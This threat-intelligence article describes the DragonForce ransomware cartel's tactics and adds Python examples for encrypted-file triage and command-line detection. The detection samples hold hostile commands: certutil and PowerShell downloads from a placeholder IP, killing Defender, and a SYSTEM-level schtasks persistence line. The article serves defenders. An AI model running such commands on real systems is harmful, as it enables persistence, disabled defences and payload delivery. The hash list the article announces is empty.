The threat landscape of 2025 is shaped not only by relentless malware but also by the emergence of new organizational models among cybercriminals.
One of the most notable developments is the rise of the DragonForce ransomware cartel, a threat actor that has pivoted from traditional Ransomware-as-a-Service (RaaS) to a full-scale cartel, providing infrastructure and operational tools for affiliates.
Here, we explore the technical elements behind DragonForce’s success and its implications for defenders.

Technical Architecture and Tactics
Ransomware Payload and Operational Modes
DragonForce started making headlines in late 2023, leveraging variants reminiscent of LockBit 3.0 but later evolving to use the Conti ransomware family. The group is known for its Windows encryptor, which supports:
- Partial, full, and header encryption: Allows customization per target or data sensitivity.
- Selective folder encryption and log obfuscation: Encrypts only critical or high-value directories, making detection harder and maximizing impact.
- Filename encryption: Adds another layer of obfuscation during incident response.
Example of Ransomware Execution (Windows)
dragonforce.exe --target "C:\SensitiveData" --mode full --encrypt-logs
The group’s ransomware is cross-platform, targeting Windows, Linux, and ESXi systems, with improvements inspired by public decryption research (notably Akira’s GPU-based decryptor). This flexibility ensures a wide attack surface in organizations running heterogeneous IT infrastructures.
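To see how the three encryption modes above change what a defender should look for on disk, here is an added example (not DragonForce code and not any vendor's tool): a Python triage helper that scores fixed-size windows of a file for Shannon entropy and classifies it as plaintext, fully encrypted, header-only or partially encrypted, and also flags the .dragonforce_encrypted extension the article lists under Impact. The sample files, the 4 KiB window and the 7.5 bits/byte threshold are constructed assumptions for the demonstration.

```python
"""Triage helper: flag files that look ransomware-encrypted.

Added example, not DragonForce code or any vendor's tool. It assumes
encrypted regions are near-uniformly random (high Shannon entropy) and
that a header-only or partial-encryption mode leaves the rest of the
file intact, so it scores fixed-size windows across the whole file
rather than only the first bytes.
"""
import math
import os
from collections import Counter

SUSPICIOUS_EXTENSION = ".dragonforce_encrypted"  # extension named in the article
ENTROPY_THRESHOLD = 7.5      # bits/byte; random data approaches 8.0, text sits around 4-5
WINDOW = 4096                # bytes per scored window (assumption)


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def window_entropies(data: bytes, window: int = WINDOW) -> list[float]:
    """Entropy of each consecutive `window`-sized slice of `data`."""
    return [shannon_entropy(data[i:i + window]) for i in range(0, len(data), window)]


def classify(name: str, data: bytes) -> dict:
    """Describe which encryption pattern, if any, the bytes resemble."""
    ents = window_entropies(data)
    high = [e >= ENTROPY_THRESHOLD for e in ents]
    verdict = {
        "name": name,
        "suspicious_extension": name.endswith(SUSPICIOUS_EXTENSION),
        "windows": len(ents),
        "high_entropy_windows": sum(high),
    }
    if not ents or not any(high):
        verdict["pattern"] = "plaintext"
    elif all(high):
        verdict["pattern"] = "full"
    elif high[0] and not any(high[1:]):
        verdict["pattern"] = "header-only"
    else:
        verdict["pattern"] = "partial"
    # Either signal alone is enough to pull the file into an incident-response queue.
    verdict["flag"] = verdict["suspicious_extension"] or verdict["pattern"] != "plaintext"
    return verdict


def _sample_files() -> dict[str, bytes]:
    """Constructed inputs: one plaintext file and three encryption modes simulated with os.urandom."""
    text = (b"Quarterly report: revenue steady, headcount flat. " * 400)[:WINDOW * 4]
    rnd = os.urandom(WINDOW * 4)
    return {
        "report.docx": text,                                                   # untouched
        "report.docx.dragonforce_encrypted": rnd,                              # full encryption
        "archive.zip": rnd[:WINDOW] + text[WINDOW:],                           # header-only
        "db.bak": text[:WINDOW] + rnd[WINDOW:WINDOW * 2] + text[WINDOW * 2:],  # partial, mid-file
    }


def triage() -> dict[str, str]:
    """Map each constructed file name to the detected encryption pattern."""
    return {name: classify(name, data)["pattern"] for name, data in _sample_files().items()}


if __name__ == "__main__":
    for name, data in _sample_files().items():
        v = classify(name, data)
        print(f"{name:40s} {v['pattern']:12s} flag={v['flag']}")
```

The point of scoring every window rather than the first few kilobytes is the partial mode: a scanner that only inspects the file header sees plaintext for `db.bak` and misses it, while the header-only mode would be caught by either approach.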
Initial Access, Persistence, and Lateral Movement
Initial Access:
DragonForce operators typically gain initial footholds through:
- Phishing and social engineering (sometimes impersonating IT staff).
- Exploiting unpatched vulnerabilities, including:
  - CVE-2024-21412 (Windows SmartScreen bypass)
  - CVE-2024-21887 (Ivanti Connect Secure)
  - CVE-2024-21893 (another Ivanti vulnerability)
Persistence:
Once inside, the group relies on “Living Off the Land” (LOTL) techniques to evade detection, commonly using:
- Schtasks.exe and Taskkill.exe for scheduled tasks and disabling security tools.
- PowerShell scripts to alter system and power settings.
Lateral Movement:
DragonForce abuses legitimate Remote Monitoring and Management (RMM) tools like SimpleHelp, normally trusted by IT teams, to pivot across networks without raising alarms. The malware can also propagate through removable media.
Example PowerShell Persistence Command
schtasks /create /tn "DFUpdater" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\df_task.ps1" /sc onlogon /ru SYSTEM
Command and Control (C2):
Ingress Tool Transfer tactics are used to import additional tools, often leveraging FTP, Certutil.exe, or direct PowerShell download commands.
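The persistence and ingress-tool-transfer behaviours described above all surface in process-creation telemetry, so here is an added example of the detection side (not from the article or any vendor product): a small Python rule set run over constructed Sysmon-style Event ID 1 records. The field names Image and CommandLine follow Sysmon naming, the security-tool process list is illustrative, the IP addresses are TEST-NET values, and every sample event is made up for this demonstration; the first event is the article's own schtasks command.

```python
"""Command-line detections for the LOTL patterns in the article.

Added example, not from the article or any vendor product. Events are
constructed dicts shaped like Sysmon Event ID 1 (process creation);
the SECURITY_PROCESSES list is illustrative and should be tuned to the
EDR/AV actually deployed.
"""
import re
from dataclasses import dataclass

# Security tooling that taskkill should not be ending during normal operations (illustrative).
SECURITY_PROCESSES = ("msmpeng", "sense", "bdagent", "epsecurityservice", "cylancesvc")


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str            # ATT&CK technique id for the analyst
    image: str                # regex matched against the executable's basename
    required: tuple           # regexes that must ALL appear somewhere in the command line


RULES = (
    Rule("Scheduled task runs PowerShell as SYSTEM with execution-policy bypass", "T1053.005",
         r"schtasks(\.exe)?",
         (r"/create\b", r"-(ExecutionPolicy|ep|exec)\s+bypass", r'/ru\s+"?(NT AUTHORITY\\)?SYSTEM\b')),
    Rule("taskkill against security tooling", "T1562.001",
         r"taskkill(\.exe)?",
         (r"/im\s+(" + "|".join(SECURITY_PROCESSES) + r")",)),
    Rule("certutil used as a downloader", "T1105",
         r"certutil(\.exe)?",
         (r"-urlcache\b", r"https?://")),
    Rule("PowerShell download cradle", "T1105",
         r"(powershell|pwsh)(\.exe)?",
         (r"(DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer)",)),
)


def _basename(path: str) -> str:
    """Last path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def match_event(event: dict) -> list[str]:
    """Return the names of every rule the event trips (empty list means no hit)."""
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    return [
        rule.name
        for rule in RULES
        if re.fullmatch(rule.image, image, re.I)
        and all(re.search(pattern, cmd, re.I) for pattern in rule.required)
    ]


# Constructed sample telemetry: event 1 is the article's schtasks command; the rest are
# one benign and one suspicious variant per tool. 198.51.100.0/24 is documentation space.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "DFUpdater" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\df_task.ps1" /sc onlogon /ru SYSTEM'},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Backup" /tr "C:\Tools\backup.exe" /sc daily /st 02:00'},
    {"EventID": 1, "Image": r"C:\Windows\System32\taskkill.exe",
     "CommandLine": "taskkill /F /IM MsMpEng.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/stage2.bin C:\Users\Public\s.bin"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -verify -urlfetch cert.cer"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\""},
]


def scan(events=SAMPLE_EVENTS) -> dict[str, list[str]]:
    """Map each event's command line to the rule names it matched."""
    return {e["CommandLine"]: match_event(e) for e in events}


def alert_count(events=SAMPLE_EVENTS) -> int:
    """Number of events that tripped at least one rule."""
    return sum(1 for e in events if match_event(e))


if __name__ == "__main__":
    for cmd, hits in scan().items():
        print(("ALERT " if hits else "ok    ") + cmd[:70], hits)
```

Each rule requires every listed token rather than one ordered regex, so the schtasks detection fires regardless of the order in which /tr, /sc and /ru appear; the benign scheduled task, and certutil used for its intended certificate checks, produce no alert.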
Data Exfiltration and Extortion Infrastructure
DragonForce maintains a robust data leak site (DLS), where they list victims, stolen data sizes, and countdowns to public disclosure. They have streamlined public access by removing CAPTCHAs, likely aiming to enhance visibility and pressure on victims.
- Their DLS supports browsing file/folder structures of exfiltrated data and direct downloading.
- The cartel provides partners with infrastructure—blogs, file servers, client/admin panels, and automated work processes—an innovation over traditional RaaS, making entry easier for affiliates.
The Cartel Model and Its Security Implications
Cartel Versus Classic RaaS
Unlike classic RaaS groups, DragonForce offers affiliates 80% of profits while supplying the technical backbone required to manage campaigns. This cartel-like structure empowers partners but also allows DragonForce to:
- Control or terminate infrastructure access if affiliates act against cartel interests.
- Foster an expanding, loyal network seeking operational autonomy but willing to share ransom proceeds for turnkey capabilities.
They have actively targeted competitors (e.g., defacing Mamona, attempting to absorb RansomHub’s affiliates), signaling a ruthless approach to market dominance.
Tactics, Techniques, and Procedures (TTPs) Summary
- Initial access: Phishing, credential abuse, N-day/exploitable vulnerabilities
- Execution: Command-line, DLL hijacking, shared modules
- Persistence: Scheduled tasks, LOTL binaries, power management
- Evasion: Timestomping, modifying security tools, analysis evasion
- Lateral movement: RMM tool abuse, network share propagation, removable media
- C2: FTP, Certutil, PowerShell
- Impact: .dragonforce_encrypted extension, exfiltration, extortion
Indicators of Compromise (Sample SHA256 Hashes)
Defensive Recommendations
A multi-layered security posture is recommended: patch management, network and endpoint protection, multi-factor authentication, continuous monitoring, and behavioral analysis to catch LOTL-based attacks.
Bitdefender’s GravityZone PHASR and IntelliZone are cited as examples of proactive defense tools.
The DragonForce cartel’s evolution marks a significant shift in ransomware economics and technical playbooks. Organizations must shift from reactive controls to resilient, intelligence-driven defense if they hope to withstand this new breed of cybercriminal cartel.